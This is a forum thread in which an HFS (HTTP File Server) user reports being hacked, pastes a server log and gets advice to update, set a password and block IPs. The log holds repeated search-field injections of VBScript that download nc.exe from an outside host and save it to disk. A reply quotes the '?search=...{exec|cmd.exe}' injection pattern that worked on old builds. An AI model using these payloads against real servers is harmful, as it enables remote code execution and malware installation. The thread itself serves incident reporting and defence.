rejetto forum

i've been hacked

userhfs · 13 · 8237

0 Members and 1 Guest are viewing this topic.

Offline userhfs

  • Occasional poster
  • *
    • Posts: 4
    • View Profile
Hello all!

Today my antivirus told me, that trojan was deleted. It was a vbs-script, i've opened it in N++ and here it is on screenshot.

After that i've started try to found, how it happened. And i found it. HFS working on  80 port, and every day i have a lot of messages of "requested GET" and "trying to upload xml". I've opened HFS and saw it (look screenshot).

I've exported full log to txt file and here it is:

Code: [Select]
9:24:21 150.70.188.172:53306 Requested GET /
9:31:24 150.70.173.52:45675 Requested GET /
10:33:11 150.70.188.182:45937 Requested GET /
12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
13:10:33 150.70.188.178:57561 Requested GET /
15:19:09 150.70.188.178:52023 Requested GET /
15:36:46 150.70.173.43:58891 Requested GET /
17:06:33 150.70.173.7:48701 Requested GET /
18:37:18 150.70.188.181:50506 Requested GET /
19:07:36 150.70.173.57:57074 Requested GET /
20:01:32 188.138.1.218:42693 Requested GET /
21:58:16 188.32.198.69:17087 Requested GET /
14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
21:34:42 150.70.173.10:54565 Requested GET /
23:49:04 150.70.188.172:57408 Requested GET /
0:05:27 150.70.173.8:56183 Requested GET /
0:35:08 150.70.188.169:41555 Requested GET /
3:21:10 150.70.188.166:44530 Requested GET /
4:36:26 150.70.97.86:48072 Requested GET /
6:51:26 150.70.173.49:34699 Requested GET /
7:13:12 185.130.5.146:41838 Requested HEAD /
7:27:38 94.102.49.78:32822 Requested GET /
10:14:02 95.220.12.221:56833 Requested GET /
10:14:02 95.220.12.221:56841 Requested GET /
11:36:21 150.70.188.182:36670 Requested GET /
11:50:43 150.70.173.55:57792 Requested GET /
12:54:18 150.70.188.179:46689 Requested GET /
13:59:29 150.70.173.44:58075 Requested GET /
14:04:32 127.0.0.1:61309 Upload failed, Folder not found: getstring.xml
23:53:11 150.70.188.180:38578 Requested GET /
2:39:02 162.13.170.123:60331 Requested GET /
14:05:32 127.0.0.1:58712 Upload failed, Folder not found: getstring.xml
14:14:29 193.124.183.62:59434 Requested GET /
18:38:16 150.70.188.165:52615 Requested GET /
0:53:07 150.70.188.180:38067 Requested GET /
3:02:21 150.70.173.41:58793 Requested GET /
4:21:49 37.153.173.10:57460 Requested GET /
5:25:08 185.129.62.62:55354 Requested GET /
5:45:42 185.65.135.227:54500 Requested GET /
6:58:03 171.25.193.131:22518 Requested GET /
9:45:22 150.70.173.5:41667 Requested GET /
11:56:00 193.124.183.62:50858 Requested GET /
12:24:58 185.130.5.146:47664 Requested HEAD /
14:06:30 127.0.0.1:51959 Upload failed, Folder not found: getstring.xml
16:53:28 163.172.13.21:63567 Requested GET /
17:53:59 66.240.192.138:51136 Requested GET /
18:17:14 150.70.188.171:37191 Requested GET /
21:19:42 159.224.52.241:57673 Requested GET /
22:04:44 150.70.173.40:58734 Requested GET /
23:13:02 193.124.183.62:62283 Requested GET /
0:27:39 162.13.170.123:56872 Requested GET /
4:04:43 188.32.105.181:65077 Requested GET /
4:09:21 150.70.173.58:34591 Requested GET /
5:16:26 77.247.181.162:46931 Requested GET /
7:49:13 51.254.44.137:41738 Requested GET /
9:49:22 150.70.188.178:55827 Requested GET /
10:38:10 193.124.183.62:61670 Requested GET /
14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
15:42:55 185.130.5.146:39691 Requested HEAD /
17:24:32 137.226.113.7:44838 Requested GET /
19:15:21 193.124.183.62:55358 Requested GET /
1:46:28 188.138.1.218:59867 Requested GET /
3:10:43 62.210.162.182:41469 Requested GET /
3:10:45 62.210.162.182:48773 Requested GET /
4:50:19 176.10.99.206:60831 Requested GET /
5:05:30 112.115.19.84:60662 Requested GET /
5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:03 112.115.19.84:60677 Requested GET /?search=5:06:04 112.115.19.84:60678 Requested GET /?search=5:06:10 112.115.19.84:60679 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:13 112.115.19.84:60680 Requested GET /?search=5:06:14 112.115.19.84:60681 Requested GET /?search=5:17:19 112.115.19.84:60818 Requested GET /
5:17:46 112.115.19.84:60839 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:17:49 112.115.19.84:60840 Requested GET /?search=5:17:49 112.115.19.84:60841 Requested GET /?search=5:17:58 112.115.19.84:60842 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:18:00 112.115.19.84:60843 Requested GET /?search=5:18:01 112.115.19.84:60844 Requested GET /?search=5:32:09 150.70.188.181:42913 Requested GET /
5:58:29 150.70.188.181:42625 Requested GET /

So, what should i do, to prevent same situations? Now i switched off HFS+, but i really need it. Let me know, how to prevent illegal actions. Thanks!


Offline Mars

  • Operator
  • Tireless poster
  • *****
    • Posts: 2063
    • View Profile
very strange??

target ip for nc.exe is a HFS web server

vbs script probably come from another source

What you can do is to make a log to file and select  "request dump" and eventually "reply" to obtain more information about connections

if possible block all communication from an to this ip in your firewall

« Last Edit: March 09, 2016, 11:20:27 PM by Mars »


Offline userhfs

  • Occasional poster
  • *
    • Posts: 4
    • View Profile
VBS script came from HFS+, as you could see, throught HFS vulnerability. Hacker put special command in search field and file has been created on my pc. Is there anyone of admins, or technicians? I guess, tgey should know about that. My fault, that root directory haven't a password. Now, i've protected it by password, so hacker cant access to search field. 2nd step was an update of HFS - from 2.3 to 2.3g.


Offline Mars

  • Operator
  • Tireless poster
  • *****
    • Posts: 2063
    • View Profile
with the last build you can be reassured, because you were using version 289 that was sensitive to the cmd attack by url with "? search = 00%{exec|cmd.exe.}"

similarly as explain in this post about build 287, build 289 was not protected
http://www.rejetto.com/forum/bug-reports/uploading-backdor-in-287/msg1060051/#msg1060051
since hfs 2.3d build 292 the problem is solved,

because I have certain privileges here, it is possible for me to access the home page of your server from your IP, I see that you have made an update of hfs with the latest version, so you no longer risk being injured party in the same attack
 
you can now rest easy ;)

strangely HFS server complained to the IP address 150.129.217.214 is no longer available

the "hacker" is not a stranger on  the forum
 ;D ;D
« Last Edit: March 10, 2016, 11:07:59 AM by Mars »


Offline userhfs

  • Occasional poster
  • *
    • Posts: 4
    • View Profile
Thanks for your reply! Ok, now i've set password for root directory, and 'search field' now is unavailable. Thanks!


Offline userhfs

  • Occasional poster
  • *
    • Posts: 4
    • View Profile
Adn could someone tell me, what does it mean?

Code: [Select]
14:11:08 127.0.0.1:55616 Upload failed for getstring.xml: Folder not found.
14:11:08 127.0.0.1:55616 Upload failed getstring.xml
18:13:23 Check update: no new version


Offline LeoNeeson

  • Tireless poster
  • ****
    • Posts: 858
  • Status: On hiatus       (sporadically here)
    • View Profile
    • twitter.com/LeoNeeson
By doing a lookup on that IP address range, it seems that 150.70.*.* (which appears a lot in your log), it seems to belong to "trendmicro.com" company, in Japan. May be this company was scanning your server, or doing something weird? I don't know, but it doesn't look like an IP address from a normal ISP.

The IP 150.129.217.214 is from some ISP in China, and may be some attacker. Well, I'm not expert on this, but there is no more public information about who may be behind this (only that Chinese ISP knows who was the end user, if that user wasn't browsing from a public Cybercafe).
HFS in Spanish (HFS en Español) / How to compile HFS (Tutorial)
» Currently taking a break, until HFS v2.4 get his stable version.


Offline Mars

  • Operator
  • Tireless poster
  • *****
    • Posts: 2063
    • View Profile
Using this software, you will see what is the process in real time using the address 127.0.0.1 remotely on port 80

unzip and run TCPView.exe, probably you can have an alert from protect sotfware, you can ignore it without risk.


Offline rejetto

  • Administrator
  • Tireless poster
  • *****
    • Posts: 13521
    • View Profile
i'm sorry for this accident, but it's a bad idea to have a server on the internet and not let it update.



Offline surikat

  • Occasional poster
  • *
    • Posts: 74
    • View Profile

Offline bmartino1

  • Tireless poster
  • ****
    • Posts: 911
  • I'm only trying to help i mean no offense.
    • View Profile
    • My HFS Google Drive Shared Link
request head is exactly that, just request the url header

in html
https://www.w3schools.com/tags/tag_header.asp
<header>
</header>

is only retrieved here

this would included cooki sid / encryption and other info to what webserver your using and other,
its normaly to see head request followed by other networking and request

in the white hacker ethical hacking course, this is an atempt to see what is running and what replies with what.

given the hack atempt, i would asume that the request was to see what version of hfs you were runnning with what web client and how they would atmpet a dos atack to your site
Files I have snagged and share can be found on my google drive:

https://drive.google.com/drive/folders/1qb4INX2pzsjmMT06YEIQk9Nv5jMu33tC?usp=sharing


Offline surikat

  • Occasional poster
  • *
    • Posts: 74
    • View Profile
 
Thanks!
Sent to the ban ip from which was requested head /
Is it possible to automatically configure such IPs with such a request to be blocked?



Offline rejetto

  • Administrator
  • Tireless poster
  • *****
    • Posts: 13521
    • View Profile
the higher the number of the port, the harder it will be to reach.
But FIRST software must be updated.